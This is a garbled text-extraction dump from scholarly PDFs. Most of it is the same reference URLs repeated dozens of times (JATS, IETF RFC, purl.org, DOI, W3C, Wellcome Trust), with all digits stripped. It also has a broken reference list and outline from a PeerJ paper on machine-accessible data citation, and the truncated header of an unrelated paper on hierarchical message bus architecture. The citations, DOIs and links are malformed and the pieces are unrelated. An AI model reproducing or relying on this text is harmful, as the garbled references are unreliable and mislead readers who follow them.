https://tools.ietf.org/html/rfc http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html http://jats.nlm.nih.gov/publishing/tag-library/ . d /index.html https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html https://purl.org/docs/help.html http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://dx.doi.org/ . / eo http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dcpapers.dublincore.org/pubs/article/view/ / http://dx.doi.org/ . /nrd -c http://dx.doi.org/ . /peerj-cs. rans j, day m, duke m, ball a. . enabling the citation of datasets generated through public health research. available at http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy communications/documents/web document/wtp .pdf. rekdal ob. . academic urban legends. social studies of science ( ): – doi . / . richardson l, ruby s. . restful web services. sebastopol ca: o’reilly. salzberg sl, pop m. . bioinformatics challenges of new sequencing technology. trends in genetics : – doi . /j.tig. . . . shendure j, ji h. . next-generation dna sequencing. nature biotechnology : – doi . /nbt . shepherd, fiumara, walters, stanton, swisher, lu, teoli, kantor, smith. . content negotiation. mozilla developer network. available at https://developer.mozilla.org/docs/web/ http/content negotiation. stein l. . the case for cloud computing in genome informatics. genome biology ( ): – doi . /gb- - - - . strasser b. . collecting, comparing, and computing sequences: the making of margaret o. dayhoff ’s atlas of protein sequence and structure, – . journal of the history of biology ( ): – doi . /s - - - . uhlir p. . for attribution—developing data attribution and citation practices and standards: summary of an international workshop ( ). technical report. the national academies press. available at http://www.nap.edu/openbook.php?record id= . vasilevsky na, brush mh, paddock h, ponting l, tripathy sj, larocca gm, haendel ma. . on the reproducibility of science: unique identification of research resources in the biomedical literature. peerj :e doi . /peerj. . starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://www.wellcome.ac.uk/stellent/groups/corporatesite/@policy_communications/documents/web_document/wtp .pdf http://dx.doi.org/ . / http://dx.doi.org/ . /j.tig. . . http://dx.doi.org/ . /nbt https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation https://developer.mozilla.org/docs/web/http/content_negotiation http://dx.doi.org/ . /gb- - - - http://dx.doi.org/ . /s - - - http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://www.nap.edu/openbook.php?record_id= http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /peerj-cs. achieving human and machine accessibility of cited data in scholarly publications introduction background why cite data? the eight core principles of data citation implementation questions arising from the jddcp recommendations for achieving machine accessibility what is machine accessibility? unique identification landing pages content encoding on landing pages best practices for dataset description serving the landing pages persistence guarantees implementation: stakeholder responsibilities conclusion acknowledgements appendix serving landing pages: implementation details serving landing pages: linking to the data references international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - improvement of architecture based on hierarchical message bus zhengwei wang school of computer science and engineering xi'an technological university xi'an, , china e-mail: @qq.com jinhui li school of computer science and engineering xi'an technological university xi'an, , china e-mail: @qq.com kun wang school of computer science and engineering xi'an technological university xi'an, , china 